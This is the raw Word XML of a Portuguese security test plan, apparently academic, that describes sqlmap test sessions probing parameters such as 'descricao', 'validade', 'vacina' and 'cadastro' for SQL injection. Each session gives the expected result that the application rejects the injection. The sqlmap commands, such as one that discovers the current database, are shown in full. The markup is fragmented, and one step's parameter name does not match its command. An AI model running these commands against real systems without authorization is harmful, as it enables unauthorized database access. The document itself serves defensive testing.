          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>param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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B38C9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Pr="00D56FE7" w:rsidRDefault="004B38C9" w:rsidP="00B005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na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 para </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indicar corretamente</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a ser testado pelo Sqlmap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comando do Sqlmap pede que seja informado um parâmetro para possível injeção de SQL.</w:t>
      </w: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005A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 utilizado: sqlmap -r params -p descricao --current-db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2825" w:rsidRPr="00D56FE7" w:rsidRDefault="00F02825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r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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</w:t>
      </w:r>
      <w:r w:rsidR="007E2011" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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>pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada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descrição” é o parâmetro que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="002C07B9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a 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005A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>“--current-db” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094228B" w:rsidRPr="00D56FE7" w:rsidRDefault="0094228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D56FE7" w:rsidRDefault="00190AAD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F87AAF" w:rsidRPr="00D56FE7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101063" w:rsidRPr="00D56FE7" w:rsidRDefault="00190AAD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a-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00101063" w:rsidP="007114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r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="0094228B" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00065E32" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e não permita</w:t>
      </w:r>
      <w:r w:rsidR="0094228B" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que ele seja vulnerável à injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094228B" w:rsidRPr="00D56FE7" w:rsidRDefault="0094228B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87AAF" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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Default="00D76012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101063" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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6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4B38C9" w:rsidRDefault="004B38C9" w:rsidP="00713FB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5888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38231022" wp14:editId="342EAE30">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>329565</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-224790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="520954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B38C9" w:rsidRDefault="004B38C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7AFED" wp14:editId="4B74C421">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>386715</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>278765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3762375" cy="1809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09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5E84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30.45pt;margin-top:21.95pt;width:296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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B38C9" w:rsidRDefault="004B38C9" w:rsidP="004B38C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16 – Resultado aplicação SQL Injection via Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B38C9" w:rsidRPr="00D56FE7" w:rsidRDefault="004B38C9" w:rsidP="004B38C9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A3B54" w:rsidRDefault="003A3B54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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A3B54" w:rsidRPr="00D56FE7" w:rsidRDefault="003A3B54" w:rsidP="003A3B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Alterar o comando utilizado</w:t>
      </w:r>
      <w:r w:rsidR="002C07B9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> na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2C07B9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessão de teste 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>validade”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8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validade”.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="005E45A3" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p validade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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804EC" w:rsidRPr="00D56FE7" w:rsidRDefault="007804EC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O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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-p” indica o </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">parâmetro a ser injetado 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>pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="003A3B54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validade” é o parâmetr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190AAD" w:rsidRPr="00D56FE7" w:rsidRDefault="00190AA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E45A3" w:rsidRPr="00D56FE7" w:rsidRDefault="005E45A3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D56FE7" w:rsidRDefault="00190AA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  <w:r w:rsidR="00101063" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “validade”</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e não permita que o campo seja injetável</w:t>
      </w:r>
      <w:r w:rsidR="00510DD2" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> à SQL</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B299D" w:rsidRDefault="007B299D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510DD2" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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3A3B5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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00190AAD" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“validade” escolhido </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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7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510DD2" w:rsidRPr="00D56FE7" w:rsidRDefault="007B299D" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32A710E4" wp14:editId="4E3FC5E8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>110490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>200660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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32A" w:rsidRPr="00D56FE7" w:rsidRDefault="001F4C0E" w:rsidP="00685A02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B858D" wp14:editId="044F6A90">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>177165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1341755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="390525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8FEA" id="Rectangle 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:13.95pt;margin-top:-105.65pt;width:307.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7</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Resultado exploração Sql Inj</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
      <w:r w:rsidR="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no campo validade</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0036432A" w:rsidRPr="00D56FE7" w:rsidRDefault="0036432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5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007804EC" w:rsidRPr="00D56FE7" w:rsidRDefault="007804EC" w:rsidP="007804EC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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</w:t>
      </w:r>
      <w:r w:rsidR="002C07B9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">na Sessão de teste 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8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="002D4365" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema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Pr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: sqlmap –r params –p </w:t>
      </w:r>
      <w:r w:rsidR="00790EC9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina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6432A" w:rsidRPr="00D56FE7" w:rsidRDefault="0036432A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–r“ indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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</w:t>
      </w:r>
      <w:r w:rsidR="0036432A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0036432A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="007B299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</w:t>
      </w:r>
      <w:r w:rsidR="00790EC9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é o atribut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1A0F" w:rsidRPr="00D56FE7" w:rsidRDefault="00B71A0F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65E32" w:rsidRPr="00D56FE7" w:rsidRDefault="00B71A0F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 “</w:t>
      </w:r>
      <w:r w:rsidR="00CE5109" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidR="00065E32" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e não permita que o campo seja injetável à SQL.</w:t>
      </w:r>
      <w:r w:rsidR="00065E32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E5109" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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7B299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="002C07B9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CE5109" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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8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7B299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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19C36A4B" wp14:editId="78D181DB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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BD2955" w:rsidP="007B299D">
      <w:pPr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ED034" wp14:editId="48B61C14">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>72390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1423670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="14224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F755" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.7pt;margin-top:-112.1pt;width:308.25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8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Sql Injection</w:t>
      </w:r>
      <w:r w:rsidR="00685A02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no campo vacina</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Sqlmap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5386" w:rsidRPr="00D56FE7" w:rsidRDefault="00D4538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6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="002C07B9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Alterar o comando utilizado na Sessão de teste 2</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro”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Pr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro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7B299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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p cadastro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="007B29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07B9" w:rsidRPr="00D56FE7" w:rsidRDefault="002C07B9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sqlmap” executa a ferramenta Sqlmap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r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="007B299D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cadastro” é o atributo que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="002C07B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2C07B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5CE" w:rsidRPr="00D56FE7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9F5169" w:rsidRPr="00D56FE7" w:rsidRDefault="00D975CE" w:rsidP="00B654D1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</w:t>
      </w:r>
      <w:r w:rsidR="009F5169" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tamento do parâmetro “cadastro” e não permita que o campo seja injetável à SQL.</w:t>
      </w:r>
      <w:r w:rsidR="009F5169" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
